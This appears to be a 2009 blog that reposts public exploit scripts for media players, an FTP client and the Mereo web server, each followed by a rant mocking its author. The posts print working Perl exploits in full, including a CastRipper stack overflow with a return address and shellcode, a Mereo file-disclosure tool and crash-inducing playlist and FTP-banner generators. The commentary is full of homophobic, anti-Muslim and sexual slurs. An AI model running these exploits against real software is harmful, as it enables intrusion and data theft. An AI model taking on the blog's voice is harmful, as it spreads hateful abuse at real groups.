Thursday, May 14, 2009

DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs

Main critism: SINCE WHEN DID A FUCKING CRASH BECOME A SECURITY BUG?


#####################################################################################################
# DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

#####################################################################################################
# DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3l";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";


Somebody obviously gave this bitch turrets when she was too young. She plays with dolls and playlists all day long. I speak for all Canadians by saying, "GO FUCK YOURSELF"

Tuesday, May 12, 2009

CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit

Main critism: (*DN9ysysy7F&*SSFSKK8990ol;lIO89980`*BANGS HEAD ON KEYBOARD*89&*n7``jnsdfd8u9d89udsf83ffdfd***BREAKS KEYBOARD***


#!/usr/bin/perl
# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Exploited By : zAx
# ThE-zAx@HoTMaiL.CoM
print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n";
print "Exploited By : zAx";
print "Contact at : ThE-zAx@HoTMaiL.CoM";
$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
$junk = "\x41" x 26369;
$eip="\x7D\xBC\x01\x10"; # Universal
$nopsled = "\x90" x 10;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
open(zax,">>zAx.pls");
print zax $header.$junk.$eip.$nopsled.$shellcode;
print "[+] Done !! [+]";
close(zax);


You cum guzzling metasploit ripping faggots! You probably don't even know the difference between INTEL and POWERPC chips! I HOPE MICROSHIT ADDS REAL BUFFER OVERFLOW PROTECTION JUST SO I DONT HAVE TO SLIT MY WRISTS EVERYTIME I SEE YOUR LAME TRIAL AND ERROR BULLSHIT EXPLOITS ON MILH0USE!

NO NO NO THAT STILL WONT HELP, THEN YOU'LL JUST NEVER UPGRADE AND PUT DISCLAIMERS ON THE LAME FUCKING EXPLOITS LIKE "hey im musLIM this only workZ ON WINDOWS XP SP3 NOT 4 OR 5 OR 6 OR 7 OR 8 BECAUSE IM TOO FUCKING STUPID AND I RUIN EVERYTHING MY MOTHER FUCKED A GOAT YEAH SHE DID I FUCKED MY BROTHER AND SISTER IM A FUCKHEAD ARG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" Or something of that fucking nature bitchass towelheadZ!!!

Mereo 1.8.0 Arbitrary File Disclosure Exploit

Main critism: HOLY SHIT MAW NOW IM A HACKER!@#


#!/usr/bin/perl -w
#
# Found By : Cyber-Zone (ABDELKHALEK)
# Paradis_des_fous@hotmail.fr
#
#
# Note : Don't use this for your own R!sk :d
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , SimO-sofT , r1z , ZoRLu , Mag!c ompo , ThE g0bL!N , b0rizq , All MoroCCaN Hackers

#
# demo version Tested under my MS WINDOWS sp2
#
#
use LWP::Simple;
use LWP::UserAgent;

print "\tMereo 1.8.0 Arbitrary File Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n";
print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n";
print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n";
print "\t* From : MoroccO Figuig/Oujda City *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 4)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port File\n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 boot.ini\n";
}
($HackerName, $TargetIP, $AttackedPort, $TargetFile) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print(" ******************************\n");
print(" * Status *\n");
print(" ******************************\n");
print("Loading ........................................\n\n\n");

$temp="/";
my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....> |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
if($Disclosure){
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");
print("SEE U $HackerName\n\n\n");
}
else
{
print(" Not Found !!!\n\n");
exit;
}


Y!s ho!y sh!t you lame fuckhead.. I bet your mother fucked a goat and had you, right?

Tuesday, May 5, 2009

Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow Exploit

Main critism: This fucking idiot just won't quit. QUIT FAGGOT, YOU SUCK!


#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , ZoRLu , ThE g0bL!N , r1z , Mag!c ompo , SimO-s0fT ... All MoroCCaN HaCkerS
#
# FIGUIG OwnZ !!!
#
# Streaming Audio Player 0.9 (.M3U File) Local Buffer Overflow PoC
#
#Olly Registers
#EAX 00197D20
#ECX 0000020E
#EDX 00126F84
#EBX 00193DAF
#ESP 001270B8
#EBP 7C81391C kernel32.GetFullPathNameA
#ESI 00197D20
#EDI 001272D0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 41414141
#
my $Header = "#EXTM3U\n";
my $ex="http://"."A" x 509;
open(MYFILE,'>>buffer.m3u');
print MYFILE $Header.$ex;
close(MYFILE);


LEARN TO WRITE A REAL FUCKING EXPLOIT YOU PROOF OF SHIT!

32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC

Main critism: Do these fuckups circle jerk until one of them comes up with the most idiotic name possible?


#! /usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner.
# By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
#41414141 ?? ???
#
use IO::Socket::INET;

my $socket = IO::Socket::INET->new('LocalPort' => 21,
'Proto' => 'tcp',
'Listen' => SOMAXCONN)
or die "Can't create socket ($!)\n";

print "Server listening\n";
$data = "220 ".("\x41" x 5060)."\r\n";

while (my $client = $socket->accept) {
print "send> data.\n";
print $client $data;
}
die "Can't accept socket ($!)\n";


And the weiner is... Load 99%, who posted a lame EIP FUCKING OVERWRITE PROOF OF CONCEPT exploit for some no-name loser ftp client. What, the, fuck.